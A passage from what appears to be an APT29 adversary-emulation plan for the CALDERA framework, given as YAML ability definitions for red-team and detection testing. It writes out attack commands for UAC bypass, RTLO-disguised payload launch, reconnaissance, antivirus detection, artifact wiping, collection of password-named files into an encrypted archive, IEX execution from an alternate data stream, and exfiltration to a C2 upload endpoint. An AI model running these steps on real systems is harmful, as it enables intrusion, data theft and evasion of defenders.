File did not exist to be removed!"; 20 | } 21 | 22 | if (get-job -name "Keystrokes" -ErrorAction SilentlyContinue) { 23 | Remove-Job -Name "Keystrokes"; 24 | if ($?) { 25 | write-host "[+] Job \"Keystrokes\" was remove."; 26 | } 27 | } else { 28 | write-host "[!] Job \"Keystrokes\" did not exist."; 29 | } 30 | 31 | if (get-job -Name "Screenshot" -ErrorAction SilentlyContinue) { 32 | Remove-Job -Name "Screenshot" -Force; 33 | write-host "[+] Job \"screenshot\" was removed."; 34 | } else { 35 | write-host "[*] Job \"screenshot\" does not exist, thus was not removed."; 36 | } 37 | remove-item upload.ps1 -Force; 38 | -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/defensive-evasion/5226e5dc-fc28-43b7-a679-0db49d520402.yml: -------------------------------------------------------------------------------- 1 | --- 2 | 3 | - id: 5226e5dc-fc28-43b7-a679-0db49d520402 4 | name: 14.A - UAC Bypass via sdctl 5 | description: Invoke UAC bypass sdctl 6 | tactic: defensive-evasion 7 | technique: 8 | attack_id: T1088 9 | name: Access Token Manipulation (T1134) 10 | platforms: 11 | windows: 12 | psh,pwsh: 13 | command: | 14 | . .\stepFourteen_bypassUAC.ps1; 15 | bypass; 16 | payload: stepFourteen_bypassUAC.ps1 17 | -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/defensive-evasion/5ff80022-8d85-410b-b868-6c7565b267e5.yml: -------------------------------------------------------------------------------- 1 | --- 2 | 3 | - id: 5ff80022-8d85-410b-b868-6c7565b267e5 4 | name: 3.B - Registry Cleanup for UAC Bypass Technique 5 | description: Delete registry entries post-UAC bypass. 
6 | tactic: defensive-evasion 7 | technique: 8 | attack_id: T1112 9 | name: Modify Registry 10 | platforms: 11 | windows: 12 | psh,pwsh: 13 | command: | 14 | Remove-Item -Path HKCU:\Software\Classes\Folder* -Recurse -Force; 15 | if (!(test-path -path HKCU:\Software\Classes\Folder)) { 16 | write-host "[+] Reg keys removed!"; 17 | } 18 | -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/defensive-evasion/68b588bc-002a-42dc-bac7-9189f944065b.yml: -------------------------------------------------------------------------------- 1 | --- 2 | 3 | - id: 68b588bc-002a-42dc-bac7-9189f944065b 4 | name: 3.A - Staging monkey PNG 5 | description: Staging PNG for Lateral Movement 6 | tactic: defensive-evasion 7 | technique: 8 | attack_id: T1036 9 | name: masquerading 10 | platforms: 11 | windows: 12 | psh,pwsh: 13 | command: | 14 | $username="#{profile_user}"; 15 | if ( $(test-path -path "C:\Users\$username\Downloads\monkey.png") -eq $false ) { 16 | copy-item monkey.png -Destination "C:\Users\$username\Downloads\\" -Force; 17 | if ($? -eq $True) { 18 | write-host "[+] Successfully copied monkey.png!"; 19 | get-childitem -path "C:\Users\$username\Downloads\\"; 20 | exit 0; 21 | } else { 22 | write-host "[+] Failed to copy monkey.png."; 23 | exit 1; 24 | } 25 | 26 | } else { 27 | write-host "[*] monkey.png already exists within C:\users\$username\Downloads..." 
28 | } 29 | payload: monkey.png 30 | -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/defensive-evasion/9b5b5aec-32ff-4d74-8555-727b50ab15f6.yml: -------------------------------------------------------------------------------- 1 | --- 2 | 3 | - id: 9b5b5aec-32ff-4d74-8555-727b50ab15f6 4 | name: 4.B.2 - Artifact Cleanup - Delete Files 5 | description: Clean up files related to the operation. 6 | tactic: defensive-evasion 7 | technique: 8 | attack_id: T1107 9 | name: File Deletion 10 | platforms: 11 | windows: 12 | psh,pwsh: 13 | command: | 14 | if (! $(test-path -path "C:\Program Files\SysInternalsSuite";)) { 15 | write-host "[!] The path C:\Program Files\SysInternalsSuite does not exist. Execution has stopped."; 16 | exit 1; 17 | } 18 | Set-Location -path "C:\Program Files\SysInternalsSuite"; 19 | gci $env:userprofile\Desktop; 20 | .\sdelete64.exe /accepteula "$env:USERPROFILE\Desktop\‮cod.3aka3.scr"; 21 | .\sdelete64.exe /accepteula "$env:APPDATA\Draft.Zip"; 22 | .\sdelete64.exe /accepteula "$env:USERPROFILE\Downloads\SysInternalsSuite.zip"; 23 | -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/discovery/0cfadbcb-ec21-44ae-adb7-9a23176dd620.yml: -------------------------------------------------------------------------------- 1 | --- 2 | 3 | - id: 0cfadbcb-ec21-44ae-adb7-9a23176dd620 4 | name: 13.A - Enumerate Computer Name 5 | description: Triage the host for each computer-name format - ComputerNameNetBIOS, ComputerNameDnsHostname, ComputerNameDnsDomain, ComputerNameDnsFullyQualified, ComputerNamePhysicalNetBIOS, ComputerNamePhysicalDnsHostname, ComputerNamePhysicalDnsDomain and ComputerNamePhysicalDnsFullyQualified. 6 | tactic: discovery 7 | technique: 8 | attack_id: T1082 9 | name: System Information Discovery 10 | platforms: 11 | windows: 12 | psh,pwsh: 13 | command: | 14 | . 
.\stepThirteen.ps1; 15 | comp; 16 | payload: stepThirteen.ps1 17 | -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/discovery/144b1384-5060-494f-80eb-91772695cdf3.yml: -------------------------------------------------------------------------------- 1 | --- 2 | 3 | - id: 144b1384-5060-494f-80eb-91772695cdf3 4 | name: 2.D.2 - System Service Discovery (T1007) 5 | description: The net utility is executed via cmd to enumerate local active services. 6 | tactic: discovery 7 | technique: 8 | attack_id: T1007 9 | name: System Service Discovery 10 | platforms: 11 | windows: 12 | cmd: 13 | command: | 14 | net start -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/discovery/1c8552c7-f7ed-4523-b640-72d65af5f855.yml: -------------------------------------------------------------------------------- 1 | --- 2 | 3 | - id: 1c8552c7-f7ed-4523-b640-72d65af5f855 4 | name: 16.A - Enumerate Domain Controller 5 | description: Get domain controller and current user SID for the domain 6 | tactic: discovery 7 | technique: 8 | attack_id: T1018 9 | name: Remote System Discovery 10 | platforms: 11 | windows: 12 | psh,pwsh: 13 | command: | 14 | . .\powerview.ps1; 15 | get-netdomaincontroller; 16 | payload: powerview.ps1 17 | -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/discovery/24ed020e-4730-4000-b6b4-6b5d3e95314f.yml: -------------------------------------------------------------------------------- 1 | --- 2 | 3 | - id: 24ed020e-4730-4000-b6b4-6b5d3e95314f 4 | name: 4.A.2 - Remote System Discovery (T1018) 5 | description: The net utility is executed via cmd to enumerate hosts within the domain. 
6 | tactic: discovery 7 | technique: 8 | attack_id: T1018 9 | name: Remote System Discovery 10 | platforms: 11 | windows: 12 | psh,pwsh: 13 | command: | 14 | cmd.exe /c net group "Domain Computers" /domain -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/discovery/26181249-be75-41ed-9fe7-5c30ea8c2d4d.yml: -------------------------------------------------------------------------------- 1 | --- 2 | 3 | - id: 26181249-be75-41ed-9fe7-5c30ea8c2d4d 4 | name: 2.F.2 - Permissions Groups Discovery (T1069) 5 | description: The net utility is executed via cmd to enumerate members of the domain controller’s administrators group. 6 | tactic: discovery 7 | technique: 8 | attack_id: T1069 9 | name: Permission Groups Discovery 10 | platforms: 11 | windows: 12 | cmd: 13 | command: | 14 | net localgroup administrators /domain -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/discovery/2b5a72b1-01e4-48ae-98b0-2570a7894371.yml: -------------------------------------------------------------------------------- 1 | --- 2 | 3 | - id: 2b5a72b1-01e4-48ae-98b0-2570a7894371 4 | name: 12.C - Detect Software 5 | description: Detect software on host 6 | tactic: discovery 7 | technique: 8 | attack_id: T1518 9 | name: Software Discovery 10 | platforms: 11 | windows: 12 | psh,pwsh: 13 | command: | 14 | . 
.\stepTwelve.ps1; 15 | software; 16 | payload: stepTwelve.ps1 17 | -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/discovery/2ff877b4-0c00-401e-9d3f-070c70b610df.yml: -------------------------------------------------------------------------------- 1 | --- 2 | 3 | - id: 2ff877b4-0c00-401e-9d3f-070c70b610df 4 | name: 2.D.1 - System Service Discovery (T1007) 5 | description: The sc utility is executed via cmd to enumerate local active services. 6 | tactic: discovery 7 | technique: 8 | attack_id: T1007 9 | name: System Service Discovery 10 | platforms: 11 | windows: 12 | cmd: 13 | command: | 14 | sc query -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/discovery/35d95b64-c1f8-4ac7-a2f2-8959218239cd.yml: -------------------------------------------------------------------------------- 1 | --- 2 | 3 | - id: 35d95b64-c1f8-4ac7-a2f2-8959218239cd 4 | name: 2.B.1 - System Owner / User Discovery (T1033) 5 | description: The native echo command is executed via cmd to enumerate local environment variables associated with current user and domain. 6 | tactic: discovery 7 | technique: 8 | attack_id: T1033 9 | name: System Owner/User Discovery 10 | platforms: 11 | windows: 12 | cmd: 13 | command: | 14 | echo %USERDOMAIN%\%USERNAME% -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/discovery/41610306-087c-4c34-874b-37b8ed633a36.yml: -------------------------------------------------------------------------------- 1 | --- 2 | 3 | - id: 41610306-087c-4c34-874b-37b8ed633a36 4 | name: 2.C.2 - Process Discovery (T1057) 5 | description: The tasklist utility is executed via cmd to enumerate local running processes. 
6 | tactic: discovery 7 | technique: 8 | attack_id: T1057 9 | name: Process Discovery 10 | platforms: 11 | windows: 12 | cmd: 13 | command: | 14 | tasklist /v -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/discovery/59592c35-8207-4896-8d8b-36ad4600245d.yml: -------------------------------------------------------------------------------- 1 | --- 2 | 3 | - id: 59592c35-8207-4896-8d8b-36ad4600245d 4 | name: 4.A.1 - Remote System Discovery (T1018) 5 | description: The net utility is executed via cmd to enumerate DCs within the domain 6 | tactic: discovery 7 | technique: 8 | attack_id: T1018 9 | name: Remote System Discovery 10 | platforms: 11 | windows: 12 | psh,pwsh: 13 | command: | 14 | cmd.exe /c net group "Domain Controllers" /domain -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/discovery/5c23f638-9cfc-4fc4-9cab-4af628fef70a.yml: -------------------------------------------------------------------------------- 1 | --- 2 | 3 | - id: 5c23f638-9cfc-4fc4-9cab-4af628fef70a 4 | name: 2.H.1 - Query Registry (T1012) 5 | description: The reg utility is executed via cmd to enumerate a specific Registry key associated with local system policies to ensure that the user will not be prompted for credentials when elevating permissions. 
6 | tactic: discovery 7 | technique: 8 | attack_id: T1012 9 | name: Query Registry 10 | platforms: 11 | windows: 12 | cmd: 13 | command: | 14 | reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/discovery/5df12481-9d8c-4235-b550-9cefc8ed7361.yml: -------------------------------------------------------------------------------- 1 | --- 2 | 3 | - id: 5df12481-9d8c-4235-b550-9cefc8ed7361 4 | name: 2.C.1 - Process Discovery (T1057) 5 | description: API call(s) are executed to enumerate local running processes. 6 | tactic: discovery 7 | technique: 8 | attack_id: T1057 9 | name: Process Discovery 10 | platforms: 11 | windows: 12 | psh,pwsh: 13 | command: | 14 | Import-Module .\ps.ps1 -Verbose -Force; 15 | ProcessList 16 | payload: ps.ps1 17 | -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/discovery/5f4263c4-7ff1-4098-b5f5-f41faa31cf5b.yml: -------------------------------------------------------------------------------- 1 | --- 2 | 3 | - id: 5f4263c4-7ff1-4098-b5f5-f41faa31cf5b 4 | name: 4.B.1 - System Network Configuration Discovery (T1016) 5 | description: The netsh utility is executed via cmd to enumerate local firewall configuration information. 
6 | tactic: discovery 7 | technique: 8 | attack_id: T1016 9 | name: System Network Configuration Discovery 10 | platforms: 11 | windows: 12 | cmd: 13 | command: | 14 | netsh advfirewall show allprofiles -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/discovery/61221fb9-cb32-46d5-98fd-90567a621526.yml: -------------------------------------------------------------------------------- 1 | --- 2 | 3 | - id: 61221fb9-cb32-46d5-98fd-90567a621526 4 | name: 2.G.1 - Account Discovery (T1087) 5 | description: The net utility is executed via cmd to enumerate domain user accounts. 6 | tactic: discovery 7 | technique: 8 | attack_id: T1087 9 | name: Account Discovery 10 | platforms: 11 | windows: 12 | cmd: 13 | command: | 14 | net user /domain -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/discovery/646be6c9-f27a-4f5f-be5d-b8a0317e215f.yml: -------------------------------------------------------------------------------- 1 | --- 2 | 3 | - id: 646be6c9-f27a-4f5f-be5d-b8a0317e215f 4 | name: 4.B.1 - Process Discovery 5 | description: List running process on the machine via PowerShell. 6 | tactic: discovery 7 | technique: 8 | attack_id: T1057 9 | name: Process Discovery 10 | platforms: 11 | windows: 12 | psh,pwsh: 13 | command: | 14 | $ps = get-process; 15 | write-output $ps; 16 | -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/discovery/64f1fcb4-399d-4f3b-9a6b-13ec00e1c2ce.yml: -------------------------------------------------------------------------------- 1 | --- 2 | 3 | - id: 64f1fcb4-399d-4f3b-9a6b-13ec00e1c2ce 4 | name: 2.A.2 - System Network Configuration Discovery (T1016) 5 | description: The arp utility is executed via cmd to enumerate local ARP configuration information. 
6 | tactic: discovery 7 | technique: 8 | attack_id: T1016 9 | name: System Network Configuration Discovery 10 | platforms: 11 | windows: 12 | cmd: 13 | command: | 14 | arp -a 15 | -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/discovery/6f1f4768-7099-45d2-a858-b49dc792234e.yml: -------------------------------------------------------------------------------- 1 | --- 2 | 3 | - id: 6f1f4768-7099-45d2-a858-b49dc792234e 4 | name: 4.C - Loading Stage-2 & Performing Discovery 5 | description: Load Stage-2 from Modified Sysinternals Toolset 6 | tactic: discovery 7 | technique: 8 | attack_id: T1082 9 | name: System Information Discovery 10 | platforms: 11 | windows: 12 | psh,pwsh: 13 | command: | 14 | if (! $(test-path -path "C:\Program Files\SysInternalsSuite")) { 15 | write-host "[!] The path C:\Program Files\SysInternalsSuite does not exist. Execution has stopped."; 16 | exit 1; 17 | } 18 | 19 | Set-Location -path "C:\Program Files\SysInternalsSuite"; 20 | if (!(test-path ".\readme.ps1")) { 21 | Move-Item .\readme.txt readme.ps1 -Force; 22 | } 23 | . .\readme.ps1; 24 | Invoke-Discovery; 25 | -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/discovery/7c2a6e5b-1adb-464f-a581-4677391f8dd6.yml: -------------------------------------------------------------------------------- 1 | --- 2 | 3 | - id: 7c2a6e5b-1adb-464f-a581-4677391f8dd6 4 | name: 2.E.2 - System Information Discovery (T1082) 5 | description: The net utility is executed via cmd to enumerate local operating system configuration. 
6 | tactic: discovery 7 | technique: 8 | attack_id: T1082 9 | name: System Information Discovery 10 | platforms: 11 | windows: 12 | cmd: 13 | command: | 14 | net config workstation -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/discovery/84377d7a-0363-44fd-a082-44657ca1858f.yml: -------------------------------------------------------------------------------- 1 | --- 2 | 3 | - id: 84377d7a-0363-44fd-a082-44657ca1858f 4 | name: 2.F.3 - Permissions Groups Discovery (T1069) 5 | description: The net utility is executed via cmd to enumerate members of the domain administrators group. 6 | tactic: discovery 7 | technique: 8 | attack_id: T1069 9 | name: Permission Groups Discovery 10 | platforms: 11 | windows: 12 | psh,pwsh: 13 | command: | 14 | cmd.exe /c net group "Domain Admins" /domain 15 | -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/discovery/96140694-6d13-40b6-9553-0e63533469f3.yml: -------------------------------------------------------------------------------- 1 | --- 2 | 3 | - id: 96140694-6d13-40b6-9553-0e63533469f3 4 | name: 13.B - Enumerate Domain Name 5 | description: Domain triage 6 | tactic: discovery 7 | technique: 8 | attack_id: T1082 9 | name: System Information Discovery 10 | platforms: 11 | windows: 12 | psh,pwsh: 13 | command: | 14 | . 
.\stepThirteen.ps1; 15 | domain; 16 | payload: stepThirteen.ps1 17 | -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/discovery/9ce5bf9f-44ec-44c4-bbe0-6d68a83e1b76.yml: -------------------------------------------------------------------------------- 1 | --- 2 | 3 | - id: 9ce5bf9f-44ec-44c4-bbe0-6d68a83e1b76 4 | name: 2.G.2 - Account Discovery (T1087) 5 | description: The net utility is executed via cmd to enumerate detailed information about a specific user account. 6 | tactic: discovery 7 | technique: 8 | attack_id: T1087 9 | name: Account Discovery 10 | platforms: 11 | windows: 12 | cmd: 13 | command: | 14 | net user %USERNAME% /domain -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/discovery/a34ab8f2-a106-41fb-af0b-cf5382bd18ae.yml: -------------------------------------------------------------------------------- 1 | --- 2 | 3 | - id: a34ab8f2-a106-41fb-af0b-cf5382bd18ae 4 | name: 13.D - Enumerate Processes 5 | description: Process triage 6 | tactic: discovery 7 | technique: 8 | attack_id: T1057 9 | name: Process Discovery 10 | platforms: 11 | windows: 12 | psh,pwsh: 13 | command: | 14 | . .\stepThirteen.ps1; 15 | pslist; 16 | payload: stepThirteen.ps1 17 | -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/discovery/a42be479-fc26-4d7c-9e63-7a9b74e4c8d2.yml: -------------------------------------------------------------------------------- 1 | --- 2 | - id: a42be479-fc26-4d7c-9e63-7a9b74e4c8d2 3 | name: 16.B - Enumerate Domain SID (T1033) 4 | description: Get domain user SID 5 | tactic: discovery 6 | technique: 7 | attack_id: T1033 8 | name: System Owner/User Discovery 9 | platforms: 10 | windows: 11 | psh,pwsh: 12 | command: | 13 | . 
.\stepSixteen_SID.ps1; 14 | siduser; 15 | payload: stepSixteen_SID.ps1 16 | parsers: 17 | plugins.evals.app.parsers.sid: 18 | - source: target.sid 19 | -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/discovery/ba0b398d-91b8-490a-bed2-f959afa8e1aa.yml: -------------------------------------------------------------------------------- 1 | --- 2 | 3 | - id: ba0b398d-91b8-490a-bed2-f959afa8e1aa 4 | name: 4.C.1 - System Network Connections Discovery (T1049) 5 | description: The netstat utility is executed via cmd to enumerate local active network connections. 6 | tactic: discovery 7 | technique: 8 | attack_id: T1049 9 | name: System Network Connections Discovery 10 | platforms: 11 | windows: 12 | cmd: 13 | command: | 14 | netstat -ano -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/discovery/d2ea2676-7f85-4228-b980-ab3c0e1adc03.yml: -------------------------------------------------------------------------------- 1 | --- 2 | 3 | - id: d2ea2676-7f85-4228-b980-ab3c0e1adc03 4 | name: 2.E.1 - System Information Discovery (T1082) 5 | description: The systeminfo utility is executed via cmd to enumerate local operating system configuration. 6 | tactic: discovery 7 | technique: 8 | attack_id: T1082 9 | name: System Information Discovery 10 | platforms: 11 | windows: 12 | cmd: 13 | command: | 14 | systeminfo -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/discovery/d5170a60-3bdc-44e0-9870-a38db5c0cf81.yml: -------------------------------------------------------------------------------- 1 | --- 2 | 3 | - id: d5170a60-3bdc-44e0-9870-a38db5c0cf81 4 | name: 9.A.1 - File and Directory Discovery (T1083) 5 | description: PowerShell's Get-ChildItem alias 'ls' is used to enumerate files in a remote file share. 
6 | tactic: discovery 7 | technique: 8 | attack_id: T1083 9 | name: File and Directory Discovery 10 | platforms: 11 | windows: 12 | psh,pwsh: 13 | command: | 14 | ls #{remote.file.share} 15 | -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/discovery/ee08a427-1e1d-4d8a-aeb1-978a7fcf9087.yml: -------------------------------------------------------------------------------- 1 | --- 2 | 3 | - id: ee08a427-1e1d-4d8a-aeb1-978a7fcf9087 4 | name: 2.A.1 - System Network Configuration Discovery (T1016) 5 | description: The ipconfig utility is executed via cmd to enumerate local TCP/IP network configuration information. 6 | tactic: discovery 7 | technique: 8 | attack_id: T1016 9 | name: System Network Configuration Discovery 10 | platforms: 11 | windows: 12 | cmd: 13 | command: | 14 | ipconfig /all -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/discovery/f320eebd-e75b-4194-b529-79e64ad0b9ee.yml: -------------------------------------------------------------------------------- 1 | --- 2 | 3 | - id: f320eebd-e75b-4194-b529-79e64ad0b9ee 4 | name: 13.C - Enumerate Username 5 | description: user triage 6 | tactic: discovery 7 | technique: 8 | attack_id: T1033 9 | name: System Owner/User Discovery 10 | platforms: 11 | windows: 12 | psh,pwsh: 13 | command: | 14 | . 
.\stepThirteen.ps1; 15 | user; 16 | payload: stepThirteen.ps1 17 | -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/discovery/f9c0b150-822f-497b-ad6d-187f24561e9a.yml: -------------------------------------------------------------------------------- 1 | --- 2 | 3 | - id: f9c0b150-822f-497b-ad6d-187f24561e9a 4 | name: 12.B - Detect Anti-Virus 5 | description: Detect anti-virus software on host 6 | tactic: discovery 7 | technique: 8 | attack_id: T1063 9 | name: Security Software Discovery 10 | platforms: 11 | windows: 12 | psh,pwsh: 13 | command: | 14 | . .\stepTwelve.ps1; 15 | detectav 16 | payload: stepTwelve.ps1 17 | -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/discovery/faa96e7f-081a-40b7-a743-a6a7f2627ea3.yml: -------------------------------------------------------------------------------- 1 | --- 2 | 3 | - id: faa96e7f-081a-40b7-a743-a6a7f2627ea3 4 | name: 2.F.1 - Permissions Groups Discovery (T1069) 5 | description: The net utility is executed via cmd to enumerate members of the local system's administrators group. 6 | tactic: discovery 7 | technique: 8 | attack_id: T1069 9 | name: Permission Groups Discovery 10 | platforms: 11 | windows: 12 | cmd: 13 | command: | 14 | net localgroup administrators -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/execution/08e57385-dbce-4850-8bb7-589ef79465ab.yml: -------------------------------------------------------------------------------- 1 | --- 2 | - id: 08e57385-dbce-4850-8bb7-589ef79465ab 3 | name: 9.B.1 - Automated document collection (T1119) 4 | description: Execute PowerShell collection command to collect and compress files of specific extensions. 
5 | tactic: execution 6 | technique: 7 | attack_id: T1086 8 | name: PowerShell 9 | platforms: 10 | windows: 11 | psh,pwsh: 12 | command: | 13 | move-item Rar.exe -Destination C:\Windows\Temp -Force; 14 | $env:APPDATA;$files=ChildItem -Path $env:USERPROFILE\ -Include *.doc,*.xps,*.xls,*.ppt,*.pps,*.wps,*.wpd,*.ods,*.odt,*.lwp,*.jtd,*.pdf,*.zip,*.rar,*.docx,*.url,*.xlsx,*.pptx,*.ppsx,*.pst,*.ost,*psw*,*pass*,*login*,*admin*,*sifr*,*sifer*,*vpn,*.jpg,*.txt,*.lnk -Recurse -ErrorAction SilentlyContinue | Select -ExpandProperty FullName; Compress-Archive -LiteralPath $files -CompressionLevel Optimal -DestinationPath $env:APPDATA\working.zip -Force; 15 | cd C:\Windows\Temp; 16 | .\Rar.exe a -hpfGzq5yKw "$env:USERPROFILE\Desktop\working.zip" "$env:APPDATA\working.zip"; 17 | payload: rar.exe 18 | -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/execution/571845f6-b75c-4b9d-a666-a78f7827261f.yml: -------------------------------------------------------------------------------- 1 | --- 2 | - id: 571845f6-b75c-4b9d-a666-a78f7827261f 3 | name: 1.A - RTLO Start Sandcat (T1036) 4 | description: Perform RTLO technique with SANDCAT 5 | tactic: execution 6 | technique: 7 | attack_id: T1036 8 | name: RTLO Override 9 | platforms: 10 | windows: 11 | psh,pwsh: 12 | command: | 13 | Sleep 3; 14 | $bin = Get-ChildItem *cod*scr*; 15 | $arguments = '-server "#{server}" -group "rtlo_group"'; 16 | start-process -WindowStyle Hidden $bin.FullName.toString() -ArgumentList $arguments; 17 | 18 | if ($?) { 19 | write-host "Successfully completed RTLO execution. 
A new agent should appear"; 20 | exit 0; 21 | 22 | } else { 23 | write-host "Failure of RTLO execution."; 24 | exit 1; 25 | } 26 | payload: ‮cod.3aka.scr.exe 27 | -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/execution/95564347-e77a-4a89-b08f-dcafa5468f2c.yml: -------------------------------------------------------------------------------- 1 | --- 2 | - id: 95564347-e77a-4a89-b08f-dcafa5468f2c 3 | name: 8.A.1 - Remote System Discovery (T1018) 4 | description: Custom PowerShell script to perform AD triage for domain-bound computers. 5 | tactic: execution 6 | technique: 7 | attack_id: T1086 8 | name: PowerShell 9 | platforms: 10 | windows: 11 | psh,pwsh: 12 | command: | 13 | 14 | if (! $(test-path -path "C:\Program Files\SysinternalsSuite")) { 15 | write-host "[!] The path C:\Program Files\SysinternalsSuite does not exist. Execution has stopped."; 16 | exit 1; 17 | } 18 | 19 | Set-Location -path "C:\Program Files\SysinternalsSuite"; 20 | . .\psversion.ps1; 21 | Ad-Search Computer Name *; 22 | -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/execution/a5daa530-c640-49bc-aa54-6808789a684a.yml: -------------------------------------------------------------------------------- 1 | --- 2 | - id: a5daa530-c640-49bc-aa54-6808789a684a 3 | name: 1.B - PowerShell (T1086) 4 | description: Spawn powershell.exe from cmd.exe 5 | tactic: execution 6 | technique: 7 | attack_id: T1086 8 | name: PowerShell 9 | platforms: 10 | windows: 11 | cmd: 12 | command: | 13 | powershell.exe; 14 | if ($?) 
{ 15 | write-host "[*] PowerShell successfully spawned"; 16 | exit 0; 17 | } 18 | -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/execution/c4a59e39-53b0-4ace-9528-8ff052752ece.yml: -------------------------------------------------------------------------------- 1 | --- 2 | - id: c4a59e39-53b0-4ace-9528-8ff052752ece 3 | name: 8.A.2 - Identifying current user on other machines 4 | description: Identify the current user's logon session ID via Invoke-Command; the result is parsed into the user.session.id fact for later steps. 5 | tactic: execution 6 | technique: 7 | attack_id: T1086 8 | name: PowerShell 9 | platforms: 10 | windows: 11 | psh: 12 | command: | 13 | Invoke-Command -ComputerName "$(hostname)" -ScriptBlock { Get-Process -IncludeUserName | Select-Object UserName,SessionId | Where-Object { $_.UserName -like "*\$env:USERNAME" } | Sort-Object SessionId -Unique } | Select-Object UserName,SessionId -Last 1; 14 | parsers: 15 | plugins.evals.app.parsers.sessionid: 16 | - source: user.session.id 17 | -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/execution/e506f811-884d-4992-aacb-514b33a0324f.yml: -------------------------------------------------------------------------------- 1 | --- 2 | - id: e506f811-884d-4992-aacb-514b33a0324f 3 | name: 11.A - Click .LNK payload 4 | description: Emulate the user opening the .LNK payload - the PowerShell stage is read from the staged document's alternate data stream and executed. 
5 | tactic: execution 6 | technique: 7 | attack_id: T1204 8 | name: Execution - User Execution via .lnk 9 | platforms: 10 | windows: 11 | psh,pwsh: 12 | command: | 13 | Set-Location -Path "C:\Users\#{profile_user_day2}\Desktop"; 14 | 15 | if(Test-Path -LiteralPath "$env:appdata\Microsoft\kxwn.lock"){ 16 | Remove-Item "$env:appdata\Microsoft\kxwn.lock" -Force; 17 | Write-Host "Removed old kxwn.lock file"; 18 | } 19 | 20 | powershell.exe Get-Content '.\2016_United_States_presidential_election_-_Wikipedia.html' -Stream schemas | IEX; 21 | cleanup: | 22 | Remove-Item "$env:appdata\Microsoft\kxwn.lock" -Force; 23 | 24 | -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/exfiltration/2d18c8ec-4593-49dc-9bf4-11d0673d6ae6.yml: -------------------------------------------------------------------------------- 1 | --- 2 | - id: 2d18c8ec-4593-49dc-9bf4-11d0673d6ae6 3 | name: 9.B.8 - Data from staged file (T1074) and Exfiltration over C2 Channel (T1041) 4 | description: Copy a target file from a remote file share through the existing C2 channel 5 | tactic: exfiltration 6 | technique: 7 | attack_id: T1041 8 | name: Exfiltration Over Command and Control Channel 9 | platforms: 10 | windows: 11 | psh,pwsh: 12 | command: | 13 | Import-Module .\upload.ps1 -Verbose -Force; 14 | Invoke-MultipartFormDataUpload -InFile "C:\Users\#{profile_user}\Desktop\working.zip" -Uri "#{server}/file/upload"; 15 | cleanup: | 16 | remove-item upload.ps1 -Force 17 | payload: upload.ps1 18 | 19 | -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/exfiltration/4840d6dd-da13-401a-be46-05db56f4e1e0.yml: -------------------------------------------------------------------------------- 1 | --- 2 | - id: 4840d6dd-da13-401a-be46-05db56f4e1e0 3 | name: 18.A - Exfiltrate data to OneDrive 4 | description: Transfer data to a OneDrive account 
